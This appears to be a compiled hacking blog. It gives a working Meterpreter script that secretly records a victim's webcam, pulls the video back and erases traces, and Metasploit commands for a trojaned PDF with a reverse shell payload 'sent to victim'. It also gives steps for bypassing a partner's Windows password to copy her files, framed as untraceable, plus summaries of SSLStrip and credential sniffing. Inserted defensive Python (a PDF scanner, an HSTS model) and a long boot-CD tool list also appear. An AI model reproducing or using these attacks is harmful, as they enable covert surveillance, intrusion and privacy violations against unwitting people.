Activate Remote PC Webcam and Record the Victim.

This is a nice little script that records from the victim's webcam, uploads the output to your (the attacker's) machine and then cleans up after itself, leaving no files behind on the target.

Run the following command once you have a session started using the Metasploit Meterpreter, as shown in the previous tutorial.

meterpreter > run camrecorder -t 30

Code:

######################################################
# Webcam Recorder Meterpreter  Script by Intern0t.net#
# Michael Johnson  (Zero Cold)  mjog123@hotmail.com  #
# Recorder idea  by Jake Johnstone    aka. Sud0x3    #
######################################################

session = client

host,port = session.tunnel_peer.split(':')

# Menu options
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-t" => [ true,  "Time limit in seconds.( 01 to 60 )" ])

def usage
  print_line("Webcam Recorder Meterpreter  Script by Intern0t.net")
  print_line(" Michael Johnson  (Zero Cold)  mjog123@hotmail.com ")
  print_line("###################################################")
  print_line("Usage: camrecorder -t <time> ")
  print(@@exec_opts.usage)
  raise Rex::Script::Completed
end

# File to upload to the target host (self-extracting archive containing ffmpeg)
ffmpegexe = File.join(Msf::Config.install_root, "data", "upload.exe")

# Function to upload files
def upload(session,file)
  location = session.fs.file.expand_path("%TEMP%")
  fileontrgt = "#{location}\\upload.exe"
  print_status("Uploading Self Extracting Archive ...")
  session.fs.file.upload_file("#{fileontrgt}","#{file}")
  print_status("Upload Complete ...")
  return fileontrgt
end

# Capture video from webcam
def camrec(client,session,time)
  location = session.fs.file.expand_path("%TEMP%")
  print_status("Extracting ...")
  session.sys.process.execute("cmd /c ""#{location}\\upload.exe", nil,{'Hidden' => true,'Channelized' => false})
  sleep 5
  print_status("Starting Capture of #{time}'s...")
  session.sys.process.execute("cmd.exe /c #{location}\\ffmpeg -f vfwcap -r 20 -v 10 -i 0 -t 00:00:#{time} #{location}//output.avi", nil,{'Hidden' => true,'Channelized' => false})
end

# Download output file
def download(session)
  location = session.fs.file.expand_path("%TEMP%")
  print_status("Downloading Capture ...")
  fileontrgt = "#{location}\\output.avi"
  file = "/root#{::File::Separator}capture.avi"
  session.fs.file.download_file(file,fileontrgt)
  print_status("File Downloaded to #{file}")
end

# Delete left-over files
def delfiles(session)
  location = session.fs.file.expand_path("%TEMP%")
  print_status("Deleting Left Over Files ...")
  print_status("Deleting output.avi ...")
  session.sys.process.execute("cmd.exe /c del #{location}\\output.avi", nil, {'Hidden' => true})
  print_status("Deleting ffmpeg.exe ...")
  session.sys.process.execute("cmd.exe /c del #{location}\\ffmpeg.exe", nil, {'Hidden' => true})
  print_status("Deleting upload.exe ...")
  session.sys.process.execute("cmd.exe /c del #{location}\\upload.exe", nil, {'Hidden' => true})
  print_status("All Files Removed ...")
end

# Menu input
time = 0
@@exec_opts.parse(args) { |opt, idx, val|
  case opt
  when "-t"
    time = val
  when "-h"
    usage
  end
}

if time != 0
  upload(session,ffmpegexe)
  camrec(client,session,time)
  sleep(time.to_i)
  download(session)
  delfiles(session)
else
  usage
end

Download code and files here:

http://www.4shared.com/file/189489631/badb38f/_2__camrecorder.html

Hack your PDF and insert a Trojan virus.

The only tool required to hack your PDF and insert our Trojan is Metasploit. I am using Backtrack 4 R1 with Metasploit v3.4.2-dev.

Open a terminal window and change directory to the following and run msfconsole:

# cd /pentest/exploits/framework3
# ./msfconsole

Once the console is open, follow the commands below, completing the three options as required. LHOST is your IP; for external (WAN) addresses you may need to forward the LPORT you choose to your internal NAT address. Port 80 can be used if firewall rules on the remote side block other ports.

msf> use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > show options

FILENAME
INFILENAME
OUTOUTPATH
msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.2.3
msf exploit(adobe_pdf_embedded_exe) > set LPORT 4455

msf exploit(adobe_pdf_embedded_exe) > exploit

Send created PDF to victim

msf exploit(adobe_pdf_embedded_exe) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.2.3
msf exploit(handler) > set LPORT 4455
msf exploit(handler) > exploit

Wait for the target to open the PDF; once a session has opened, run:

meterpreter > execute -f cmd.exe -c -H -i
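The adobe_pdf_embedded_exe module produces a document that carries the executable as an embedded file and uses a /Launch action to run it when opened. As an added example (not part of this post or of Metasploit), the following Python checker flags PDFs that contain those name objects, with a constructed minimal PDF in the same shape and a benign one for comparison:

```python
import re

# Name objects that an "embedded executable" PDF needs (/EmbeddedFile, /Launch)
# together with the usual companions for running something on open.
SUSPICIOUS_NAMES = (b"/Launch", b"/EmbeddedFile", b"/EmbeddedFiles",
                    b"/OpenAction", b"/AA", b"/JavaScript", b"/JS")

# PDF allows any byte of a name to be written as #xx (e.g. /L#61unch), which
# defeats naive string matching; undo that before scanning.
_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalise_names(data: bytes) -> bytes:
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf(data: bytes) -> dict:
    """Count suspicious name objects in raw PDF bytes and give a verdict.

    Limitation: objects hidden inside compressed object streams (/ObjStm) are
    not inflated here, so "clean" from this checker is not proof of a clean file.
    """
    if not data.startswith(b"%PDF-"):
        raise ValueError("not a PDF: missing %PDF- header")
    norm = normalise_names(data)
    hits = {}
    for name in SUSPICIOUS_NAMES:
        # Require a delimiter after the name so /JS does not also match
        # /JavaScript and /EmbeddedFile does not also match /EmbeddedFiles.
        pattern = re.escape(name) + rb"(?=[\s/\[\]<>(){}]|$)"
        count = len(re.findall(pattern, norm))
        if count:
            hits[name.decode()] = count
    embedded = "/EmbeddedFile" in hits or "/EmbeddedFiles" in hits
    if embedded and "/Launch" in hits:
        verdict = "embedded file with launch action"
    elif hits:
        verdict = "review"
    else:
        verdict = "clean"
    return {"hits": hits, "verdict": verdict}


# Constructed sample: the shape of an embedded-exe document, reduced to essentials.
SAMPLE_MALICIOUS = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R
   /Names << /EmbeddedFiles << /Names [(payload.exe) 4 0 R] >> >> >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj << /Type /EmbeddedFile /Length 2 >> stream
MZ
endstream endobj
4 0 obj << /Type /Filespec /F (payload.exe) /EF << /F 3 0 R >> >> endobj
5 0 obj << /S /Launch /F (payload.exe) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed sample: a plain document with none of the above.
SAMPLE_BENIGN = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for label, doc in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, scan_pdf(doc))
```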

Max Moser (Metasploit) We Love You

We are not Gay for that Remark

Max Moser submitted a new version of the psnuffle credential sniffer addon to the Metasploit team. Until HDM has reviewed it and merged it into the SVN, they have uploaded a tgz to remote-exploit.org's code section: http://www.remote-exploit.org/codes/psnuffle/psnuffle_rexploit_org_09082009.tar.gz. Please note that it will be removed once it is officially available in the Metasploit SVN. Check out the demo video http://vimeo.com/6013518 if you would like to see it in action. Currently it includes POP3, IMAP, FTP and HTTP GET sniffer modules. Modules are very simple to code, so they expect new ones every few days.

With psnuffle, Metasploit has a credential sniffer in place. It's easy to use and extend; writing a new module takes only minutes.


Don’t Know Their Password, But Want Their Files?

I find myself constantly harangued by colleagues engulfed by a probably misguided dose of misogyny. The answer sought:

If I lost my partner's 'Windows password' and needed to access an important file within her 'locked account' on our shared PC; for reasons none other than to 'obtain information' that would steer course to the purchase of a birthday surprise of mammoth magnitude, bestowing happiness beyond that said to be experienced only by those long lost fabled dwellers of Shangri-La.

How could this be accomplished?

I will show you.

THIS IS NOT TRACEABLE

  • We are going to use what is generally referred to as a 'Live Distribution DVD'. This is a complete Linux operating system built to run entirely from a CD/DVD without even touching your PC's local hard drive (great eh). We will be using the FRHACK version of the Backtrack 4 pre-release (Ubuntu, Matrix style), which comes fully loaded with all the latest hacking tools. Download Backtrack 4 using this link: Backtrack4-FRHACK.
  • Once downloaded, burn the ISO to a DVD using your favourite ISO burning software, or download InfraRecorder for free (recommended to us by Google's Matt Cutts, and it actually works).
  • Ensure your PC is configured to boot from CD/DVD. Insert the Backtrack DVD and start your PC. If all goes well you should hear the DVD spin and the Backtrack Live DVD start to boot. After a few seconds you will be faced with a command prompt. Type startx and press Enter.

Now the Fun Begins

These instructions will be numbered and concise of course. There are many ways to skin this minks/minx, but I am going to show you my way (easy way). I will explicate simply for the educated how exactly to hack Windows. Text to type will be colored red for those with impaired color perception.

1. This is actually 1a. DON'T DO IT.
1b-z. Do the above: burn yourself a nice bootable DVD of the French security people's excellent adaptation of Max Moser's Backtrack 4, then boot the DVD with your carrier thumb drive inserted, and then, as per the following diagram, open a shell window.


Backtrack being none other than a collaboration of:

Metasploit integration
RFMON Injection capable wireless drivers
Kismet
AutoScan-Network, a network discovery and management application
Nmap
Ettercap
Wireshark (formerly known as Ethereal)

BackTrack's functionality is further increased by the arrangement of each tool into 16 categories. The tool categories are as follows:

Enumeration
Exploit Archives
Scanners
Password Attacks
Fuzzers
Spoofing
Sniffers
Tunneling
Wireless Tools
Bluetooth
Cisco Tools
Database Tools
Forensic Tools
Reversing

In relation to basic software packages, BackTrack throws in the mix some ordinary desktop programs such as Mozilla Firefox, Pidgin, K3b, and XMMS.

For those that didn’t understand, they’ve only just gone and got all the little Muther hacking crotchet tools ever invented and wrapped them up in a free CD bundle just for you.

2. Drive numbers may be different; look to the size for clues. Linux labels disks without numbers (sda, sdb, etc.) and partitions with numbered suffixes (sda1, sda2, etc.).

Let's assume our target drive is sda and the partition sda1. When we booted our PC we had already inserted our blank USB carrier thumb drive, which is now labelled sdb, and to which we will copy our desired content.

The following diagram shows just how we can view these drives and just how we’re able to access/copy our files.

Note: fdisk<space>minus<nospace>[small el] should be typed as fdisk -l


Remember your drives / partitions may be numbered differently to this tutorial. They could be sdb, sdc, sdd, sde, sdf, etc.

Also note that it is important that your Windows drive/PC was previously shut down correctly before proceeding. If an error occurs, please revert, shut down your Windows drive properly, and then proceed.

3. Now we have to plug our target and carrier drives into our Linux environment (screenshot below).

mkdir /mnt/sda1
mkdir /mnt/sdb1
mount /dev/sda1 /mnt/sda1
mount /dev/sdb1 /mnt/sdb1


Please remember your drive number allocations may differ, so take care.

4. We have now made both our target and carrier drives accessible within our ‘Backtrack Live CD’ Linux hacking environment.

5. Using commands such as cd and cp we are now able to navigate to our mounted target and perform our copy. Remember Linux is case sensitive, and quotes should be used around Windows paths that contain spaces.


SSLStrip and Hacking Your Passwords

Marlinspike gave a great presentation at Black Hat this year on how to subvert the SSL (HTTPS) protection used by major sites around the Internet. The interesting thing is that he does not break the SSL protocol itself; instead he demonstrates that, since HTTP is the entry point into any SSL communication, subverting HTTP allows an attacker to take control of the HTTPS communication as well.

Marlinspike also released the SSLStrip tool to automate this attack. Download SSLStrip from Moxie's website or from here. Using the SSLStrip tool, Marlinspike was able to retrieve over 130 usernames and passwords over a Tor network. These credentials were for sites such as Gmail, Yahoo, LinkedIn, PayPal, etc.

The SSLStrip tool works as follows:

  1. It performs a MITM on the HTTP connection.
  2. It replaces all HTTPS links with HTTP ones, but remembers which links were changed.
  3. It communicates with the victim client over plain HTTP for any secure link.
  4. It communicates with the legitimate server over HTTPS for the same secure link.
  5. Traffic is transparently proxied between the victim client and the legitimate server.
  6. Images such as the favicon are replaced by the familiar "secure lock" icon, to build trust.
  7. As the MITM takes place, all passwords, credentials, etc. are captured without the client knowing.

Marlinspike also discusses other techniques such as homograph attacks to make a URL look like a legitimate one. The overall talk is very interesting. You can download the presentation slides here. The video posted below is of the actual Blackhat talk given by Marlinspike.
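Step 2 of the attack only works because the client will follow a plain http:// link. As an added example (not from the talk or from the SSLStrip tool), the Python below models the HSTS behaviour that closes that gap: once a host has delivered a Strict-Transport-Security header over TLS, the client upgrades later http:// URLs for it before any request leaves the machine. Hostnames and header values are assumed for the example.

```python
import time
from urllib.parse import urlsplit, urlunsplit


class HstsStore:
    """Minimal model of a browser's dynamic HSTS cache (RFC 6797)."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._policies = {}   # host -> (expires_at, include_subdomains)

    def note_header(self, host: str, header: str, over_tls: bool) -> bool:
        """Record a Strict-Transport-Security header; True if it was accepted."""
        # RFC 6797 section 8.1: ignore the header unless it arrived over TLS,
        # otherwise the MITM that strips links could also plant or clear policies.
        if not over_tls:
            return False
        max_age, include_sub = None, False
        for directive in header.split(";"):
            name, _, value = directive.strip().partition("=")
            name, value = name.strip().lower(), value.strip().strip('"')
            if name == "max-age" and value.isdigit():
                max_age = int(value)
            elif name == "includesubdomains":
                include_sub = True
        if max_age is None:
            return False
        host = host.lower()
        if max_age == 0:
            self._policies.pop(host, None)    # max-age=0 tells the client to forget the host
        else:
            self._policies[host] = (self._clock() + max_age, include_sub)
        return True

    def is_known_host(self, host: str) -> bool:
        """True if host, or a parent with includeSubDomains, has a live policy."""
        now = self._clock()
        labels = host.lower().split(".")
        for i in range(len(labels)):
            candidate = ".".join(labels[i:])
            policy = self._policies.get(candidate)
            if policy is None:
                continue
            expires_at, include_sub = policy
            if expires_at <= now:
                del self._policies[candidate]    # expired: drop it and keep looking
                continue
            if i == 0 or include_sub:
                return True
        return False

    def upgrade(self, url: str) -> str:
        """Return the URL the client actually requests (http -> https for known hosts)."""
        parts = urlsplit(url)
        if parts.scheme != "http" or not self.is_known_host(parts.hostname or ""):
            return url
        netloc = parts.hostname
        if parts.port not in (None, 80):       # RFC 6797 8.3: port 80 -> 443, others kept
            netloc = f"{netloc}:{parts.port}"
        return urlunsplit(("https", netloc, parts.path, parts.query, parts.fragment))


def strip_scenario(clock=time.time) -> list:
    """Replay the stripped-link situation; returns the URLs the client would fetch."""
    store = HstsStore(clock)
    fetched = []
    # No policy yet: the stripped http:// link from step 2 is followed as-is.
    fetched.append(store.upgrade("http://login.example.com/account"))
    # A genuine TLS visit delivers the header (assumed values for the example).
    store.note_header("example.com", "max-age=31536000; includeSubDomains", over_tls=True)
    # The same stripped link is now rewritten before any request leaves the client.
    fetched.append(store.upgrade("http://login.example.com/account"))
    # A forged header on the plain-HTTP side cannot clear the policy.
    store.note_header("example.com", "max-age=0", over_tls=False)
    fetched.append(store.upgrade("http://example.com/"))
    return fetched


if __name__ == "__main__":
    for url in strip_scenario():
        print(url)
```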

Nov 10, 2009

Repair, Fix, Hack (Windows Passwords) & Clean / Erase  / Delete

I needed to dig out this little gem again recently for a small disk repair task, so I thought I would point it out again to those that hadn’t come across it, but were searching for some nice little bootable Dos / Windows / Linux tools to repair, fix, hack and delete/clean.

Hiren's BootCD is a nice little all-in-one bootable CD which contains all of these utilities:

Partition Tools
Partition Magic Pro 8.05

Best software to partition hard drive

Acronis Disk Director 10.0.2160

Popular disk management functions in a single suite

Paragon Partition Manager 7.0.1274

Universal tool for partitions

Partition Commander 9.01

The safe way to partition your hard drive, with undo feature

Ranish Partition Manager 2.44

a boot manager and hard disk partitioner.

The Partition Resizer 1.3.4

move and resize your partitions in one step and more.

Smart Fdisk 2.05

a simple harddisk partition manager

SPecial Fdisk 2000.03v

SPFDISK a partition tool.

eXtended Fdisk 0.9.3

XFDISK allows easy partition creation and edition

GDisk 1.1.1

Complete replacement for the DOS FDISK utility and more.

Super Fdisk 1.0

Create, delete, format partitions drives without destroying data.

Partition Table Editor 8.0

Partition Table and Boot Record Editor

EASEUS Partition Master 4.0.1

Partition Resize/Move/Copy/Create/Delete/Format/Convert, Explore, etc.

Backup Tools
ImageCenter 5.6 (Drive Image 2002)

Best software to clone hard drive

Norton Ghost 11.5

Similar to Drive Image (with usb/scsi support)

Acronis True Image 8.1.945

Create an exact disk image for complete system backup and disk cloning.

Partition Saving 3.71

A tool to backup/restore partitions. (SavePart.exe)

COPYR.DMA Build013

A Tool for making copies of hard disks with bad sectors

DriveImageXML 2.02

backup any drive/partition to an image file, even if the drive is currently in use

Drive SnapShot 1.39

creates an exact Disk Image of your system into a file while windows is running.

Ghost Image Explorer 11.5

to add/remove/extract files from Ghost image file

DriveImage Explorer 5.0

to add/remove/extract files from Drive image file

WhitSoft File Splitter 4.5a

a Small File Split-Join Tool

InfraRecorder 0.50

An Open source CD/DVD burning software, also create/burn .iso images

FastCopy 1.99r4

The Fastest Copy/Delete Software on Windows

Smart Driver Backup 2.12

Easy backup of your Windows device drivers (also works from PE)

Double Driver 2.1

Driver Backup and Restore tool

DriverBackup! 1.0.3

Another handy tool to backup drivers

Recovery Tools
Active Partition Recovery 3.0

To Recover a Deleted partition.

Active Uneraser 3.0

To recover deleted files and folders on FAT and NTFS systems.

Ontrack Easy Recovery Pro 6.10

To Recover data that has been deleted/virus attack

Winternals Disk Commander 1.1

more than just a standard deleted-file recovery utility

TestDisk 6.11.3

Tool to check and undelete partition from Dos/Windows

Lost & Found 1.06

a good old data recovery software.

DiyDataRecovery Diskpatch 2.1.100

An excellent data recovery software.

Prosoft Media Tools 5.0 v1.1.2.64

Another excellent data recovery software with many other options.

PhotoRec 6.11.3

Tool to Recover File and pictures from Dos/Windows

Active Undelete 5.5

a tool to recover deleted files

Restoration 3.2.13

a tool to recover deleted files

GetDataBack for FAT 4.0

Data recovery software for FAT file systems

GetDataBack for NTFS 4.0

Data recovery software for NTFS file systems

Recuva 1.29.429

Restore deleted files from Hard Drive, Digital Camera Memory Card, usb mp3 player…

Partition Find and Mount 2.3.1

Partition Find and Mount software is designed to find lost or deleted partitions

Unstoppable Copier 4.2

Allows you to copy files from disks with problems such as bad sectors,

scratches or that just give errors when reading data.

Testing Tools
System Speed Test 4.78

it tests CPU, hard drive, etc.

PC-Check 6.05

Easy to use hardware tests

Ontrack Data Advisor 5.0

Powerful diagnostic tool for assessing the condition of your computer

The Troubleshooter 7.02

all kind of hardware testing tool

PC Doctor 2004

a benchmarking and information tool

CPU/Video/Disk Performance Test 5.7

a tool to test cpu, video, and disk

Test Hard Disk Drive 1.0

a tool to test Hard Disk Drive

Disk Speed1.0

Hard Disk Drive Speed Testing Tool

S&M Stress Test 1.9.1

cpu/hdd/memory benchmarking and information tool, including temperatures/fan speeds/voltages

IsMyLcdOK (Monitor Test) 1.02

Allows you to test CRT/LCD/TFT screens for dead pixels and defective screens

RAM (Memory) Testing Tools
GoldMemory 5.07

RAM Test utility

Memtest86+ 2.11

PC Memory Test

MemTest 1.0

a Memory Testing Tool

Video Memory Stress Test 1.7.116

a tool to thoroughly test your video RAM for errors and faults

Hard Disk Tools
Hard Disk Diagnostic Utilities

Seagate Seatools Graphical v2.13b

SeaTools for Dos 1.10

Western Digital Data Lifeguard Tools 11.2

Western Digital Diagnostics (DLGDIAG) 5.04f

Maxtor PowerMax 4.23

Maxtor amset utility 4.0

Maxtor(or any Hdd) Low Level Formatter 1.1

Fujitsu HDD Diagnostic Tool 7.00

Fujitsu IDE Low Level Format 1.0

Samsung HDD Utility(HUTIL) 2.10

Samsung Disk Diagnose (SHDIAG) 1.28

Samsung The Drive Diagnostic Utility (ESTOOL) 3.00g

IBM/Hitachi Drive Fitness Test 4.15

IBM/Hitachi Feature Tool 2.13

Gateway GwScan 5.12

ExcelStor’s ESTest 4.50

MHDD 4.6

WDClear 1.30

Toshiba Hard Disk Diagnostic 2.00b

HDD Regenerator 1.71

to recover a bad hard drive

HDAT2 4.53

main function is testing and repair (regenerates) bad sectors for detected devices

Ontrack Disk Manager 9.57

Disk Test/Format/Maintenance tool.

Norton Disk Doctor 2002

a tool to repair a damaged disk, or to diagnose your hard drive.

Norton Disk Editor 2002

a powerful disk editing, manual data recovery tool.

Hard Disk Sentinel 0.04

Hard Disk health, performance and temperature monitoring tool.

Active Kill Disk 4.1

Securely overwrites and destroys all data on physical drive.

SmartUDM 2.00

Hard Disk Drive S.M.A.R.T. Viewer.

Victoria 3.33e and 3.52rus

a freeware program for low-level HDD diagnostics

HDD Erase 4.0

Secure erase using a special feature built into most newer hard drives

HDD Scan 3.2

HDDScan is a Low-level HDD diagnostic tool, it scans surface find bad sectors etc.

HDTune 2.55

Hard disk benchmarking and information tool.

Data Shredder 1.0

A tool to Erase disk and files (also wipe free space) securely

System Information Tools
PCI and AGP info Tool (2908)

The PCI System information & Exploration tool.

System Analyser 5.3w

View extensive information about your hardware

Navratil Software System Information 0.60.32

High-end professional system information tool

Astra 5.43

Advanced System info Tool and Reporting Assistant

HWiNFO 5.3.0

a powerful system information utility

PC-Config 9.33

Complete hardware detection of your computer

SysChk 2.46

Find out exactly what is under the hood of your PC

CPU Identification utility 1.17

Detailed information on CPU (CHKCPU.EXE)

CTIA CPU Information 2.7

another CPU information tool

Drive Temperature 1.0

Hard Disk Drive temperature meter

PC Wizard 2009.1.90

Powerful system information/benchmark utility designed especially for detection of hardware.

SIW 2009-07-28

Gathers detailed information about your system properties and settings.

CPU-Z 1.52

It gathers information on some of the main devices of your system

PCI 32 Sniffer 1.4 (2908)

device information tool (similar to unknown devices)

Unknown Devices 1.2 (2908)

helps you find what those unknown devices in Device Manager really are

USBDeview 1.42

View/Uninstall all installed/connected USB devices on your system

MBR (Master Boot Record) Tools
MBRWork 1.07b

a utility to perform some common and uncommon MBR functions

MBR Tool 2.2.100

backup, verify, restore, edit, refresh, remove, display, re-write…

DiskMan4

all in one tool for cmos, bios, bootrecord and more

BootFix Utility

Run this utility if you get ‘Invalid system disk’

MBR SAVE / RESTORE 2.1

BootSave and BootRest tools to save / restore MBR

Boot Partition 2.60

add Partition in the Windows NT/2000/XP Multi-boot loader

Partition Table Doctor 3.5

a tool to repair/modify mbr, bootsector, partition table

Smart Boot Manager 3.7.1

a multi boot manager

Bootmagic 8.0

This tool is for multi boot operating systems

MBRWizard 2.0b

Directly update and modify the MBR (Master Boot Record)

BIOS / CMOS Tools
CMOS 0.93

CMOS Save / Restore Tool

BIOS Cracker 4.8

BIOS password remover (cmospwd)

BIOS Cracker 1.4

BIOS password remover (cmospwc)

BIOS Utility 1.35.0

BIOS Informations, password, beep codes and more.

!BIOS 3.20

a powerful utility for BIOS and CMOS

DISKMAN4

a powerful all in one utility

UniFlash 1.40

bios flash utility

Kill CMOS

a tiny utility to wipe cmos

Award DMI Configuration Utility 2.43

DMI Configuration utility for modifying/viewing the MIDF contents.

MultiMedia Tools
Picture Viewer 1.94

Picture viewer for DOS, supports more than 40 file types.

QuickView Pro 2.58

movie viewer for dos, supports many format including divx.

MpxPlay 1.56

a small Music Player for dos

Password Tools
Active Password Changer 3.0.420

To Reset User Password on windows NT/2000/XP/2003/Vista (FAT/NTFS)

Offline NT/2K/XP Password Changer

utility to reset windows nt/2000/xp administrator/user password.

Registry Reanimator 1.02

Check and Restore structure of the Damaged Registry files of NT/2K/XP

NTPWD

utility to reset windows nt/2000/xp administrator/user password.

Registry Viewer 4.2

Registry Viewer/Editor for Win9x/Me/NT/2K/XP

ATAPWD 1.2

Hard Disk Password Utility

TrueCrypt 6.2a

On-the-fly disk encryption tool, can create a virtual encrypted disk within a file and mount it as a real disk, can also encrypt an entire HDD/Partition/USB Drive

Content Advisor Password Remover 1.01

It Removes Content Advisor Password from Internet Explorer

Password Renew 1.1

Utility to (re)set windows passwords

WindowsGate 1.1

Enables/Disables Windows logon password validation

WinKeyFinder 1.73

Allows you to View and Change Windows XP/2003 Product Keys, backup and restore

activation related files, backup Microsoft Office 97, 2000 SP2, XP/2003 keys etc.

XP Key Reader 2.7

Can decode the XP-key on Local or Remote systems

ProduKey 1.36

Recovers the lost product key of your Windows/Office

Wireless Key View 1.27

Recovers all wireless network keys (WEP/WPA) stored in your computer by WZC

MessenPass 1.26

A password recovery tool that reveals the passwords of several instant messengers

Mail PassView 1.51

Recovers mail passwords of Outlook Express, MS Outlook, IncrediMail, Eudora, etc.

Asterisk Logger 1.04

Reveal passwords hidden behind asterisk characters

NTFS (FileSystems) Tools
NTFS Dos Pro 5.0

To access ntfs partitions from Dos

NTFS 4 Dos 1.9

To access ntfs partitions from Dos

Paragon Mount Everything 3.0

To access NTFS, Ext2FS, Ext3FS partitions from dos

NTFS Dos 3.02

To access ntfs partitions from Dos

EditBINI 1.01

to Edit boot.ini on NTFS Partition

Browsers / File Managers
Volkov Commander 4.99

Dos File Manager with LongFileName/ntfs support

(Similar to Norton Commander)

Dos Command Center 5.1

Classic dos-based file manager.

File Wizard 1.35

a file manager – colored files, drag and drop copy, move, delete etc.

File Maven 3.5

an advanced Dos file manager with high speed PC-to-PC file

transfers via serial or parallel cable

FastLynx 2.0

Dos file manager with Pc to Pc file transfer capability

LapLink 5.0

the smart way to transfer files and directories between PCs.

Dos Navigator 6.4.0

Dos File Manager, Norton Commander clone but has much more features.

Mini Windows 98

Can run from Ram Drive, with ntfs support,

Added 7-Zip, Disk Defragmenter, Notepad / RichText Editor,

Image Viewer, .avi .mpg .divx .xvid Movie Player, etc…

Mini Windows Xp

Portable Windows Xp that runs from CD/USB/Ram Drive, with Network and SATA support

7-Zip 4.65

File Manager/Archiver Supports 7z, ZIP, GZIP, BZIP2, TAR, RAR, CAB, ISO, ARJ, LZH, CHM, MSI, WIM, Z, CPIO, RPM, DEB and NSIS formats

Opera Web Browser 8.53

One of the fastest, smallest and smartest full-featured web browsers

Other Tools
Ghost Walker 11.5

utility that changes the security ID (SID) for Windows NT, 2000 and XP

DosCDroast beta 2

Dos CD Burning Tools

Universal TCP/IP Network 6.4

MSDOS Network Client to connect via TCP/IP to a Microsoft based

network. The network can either be a peer-to-peer or a server based

network, it contains 91 different network card drivers

HxD 1.7.7.0

Hex Editor provides tools to inspect and edit files, main memory, disks/disk images

Virtual Floppy Drive 2.1

enables you to create and mount a virtual floppy drive on your NT/2000/XP/Vista

Streams 1.56

Reveal/Delete NTFS alternate data streams

NewSID 4.10

utility that changes the security ID (SID) for Windows NT, 2000 and XP

Dos Tools
USB CD-Rom Driver 1

Standard usb_cd.sys driver for cd drive

Universal USB Driver 2

Panasonic v2.20 ASPI Manager for USB mass storage

ASUSTeK USB Driver 3

ASUS USB CD-ROM Device Driver Version 1.00

SCSI Support

SCSI Drivers for Dos

SATA Support

SATA Driver (gcdrom.sys) and JMicron JMB361 (xcdrom.sys) for Dos

1394 Firewire Support

1394 Firewire Drivers for Dos

Interlnk support at COM1

To access another computer from COM port

Interlnk support at LPT1

To access another computer from LPT port

and many more great DOS tools, a very good collection of DOS utilities:

extract.exe pkzip.exe pkunzip.exe unrar.exe rar.exe
ace.exe lha.exe gzip.exe uharcd.exe mouse.com
attrib.com deltree.exe xcopy.exe diskcopy.com imgExtrc.exe
undelete.com edit.com fdisk.exe fdisk2.exe fdisk3.exe
lf.exe delpart.exe wipe.com zap.com format.com
move.exe more.com find.exe hex.exe debug.exe
split.exe mem.exe mi.com sys.com smartdrv.exe
xmsdsk.exe killer.exe share.exe scandisk.exe scanreg.exe
guest.exe doskey.exe duse.exe biosdtct.exe setver.exe
intersvr.exe interlnk.exe loadlin.exe lfndos.exe doslfn.com
Cleaners
SpaceMonger 1.4

keeping track of the free space on your computer

WinDirStat 1.1.2.80

a disk usage statistics viewer and cleanup tool for Windows.

CCleaner 2.23.993

Crap Cleaner is a freeware system optimization and privacy tool

Optimizers
PageDfrg 2.32

System file Defragmenter For NT/2k/XP

NT Registry Optimizer 1.1j

Registry Optimization for Windows NT/2000/2003/XP/Vista

DefragNT 1.9

This tool presents the user with many options for disk defragmenting

JkDefrag 3.36

Free disk defragment and optimize utility for Windows 2000/2003/XP/Vista

Network Tools
Angry IP Scanner 2.21

Scans IP addresses in any range as well as any of their ports

CurrPorts 1.66

displays the list of all currently opened TCP and UDP ports on your computer

TCPView 2.54

Lists TCP and UDP endpoints, including the Local/Remote addresses of TCP connections

Winsock 2 Fix for 9x

to fix corrupted Winsock2 information by poorly written Internet programs

XP TCP/IP Repair 1.0

Repair your Windows XP Winsock and TCP/IP registry errors

Process Tools
IB Process Manager 1.04

a little process manager for 9x/2k, shows dll info etc.

Process Explorer 11.33

shows you information about which handles and DLLs processes have opened or loaded

OpenedFilesView 1.40

View opened/locked files in your system, sharing violation issues

Pocket KillBox 2.0.0.978

can be used to get rid of files that stubbornly refuse to allow you to delete them

ProcessActivityView 1.10

Detailed process access information read/write/opened files etc

Unlocker 1.8.7

This tool can delete file/folder when you get this message – Cannot delete file:

Access is denied, The file is in use by another program etc.

Registry Tools
RegScanner 1.77

Tool to find/search in the Registry of Windows

Registry Editor PE 0.9c

Easy editing of remote registry hives and user profiles

Registry Restore Wizard 1.0.4

Restores a corrupted system registry from Xp System Restore

Startup Tools
Autoruns 9.53

Displays All the entries from startup folder, Run, RunOnce, and other Registry keys,

Explorer shell extensions,toolbars, browser helper objects, Winlogon notifications,

auto-start services, Scheduled Tasks, Winsock, LSA Providers, Remove Drivers

and much more which helps to remove nasty spyware/adware and viruses.

Silent Runners Revision 59

A free script that helps detect spyware, malware and adware in the startup process

Startup Control Panel 2.8

a tool to edit startup programs

Startup Monitor 1.02

it notifies you when any program registers itself to run at system startup

HijackThis 2.0.2

a general homepage hijackers detector and remover and more

Tweakers
Dial a Fix 0.60.0.24

Fix errors and problems with COM/ActiveX object errors and missing registry entries,

Automatic Updates, SSL, HTTPS, and Cryptography service (signing/verification)

issues, Reinstall internet explorer etc. comes with the policy scanner

Ultimate Windows Tweaker 2.0

A TweakUI Utility for tweaking and optimizing Windows Vista

TweakUI 2.10

This PowerToy gives you access to system settings that are not exposed in the Windows Xp

Xp-AntiSpy 3.97.4 beta

it tweaks some Windows XP functions, and disables some unneeded Windows services quickly

Shell Extensions Manager (ShellExView) 1.40

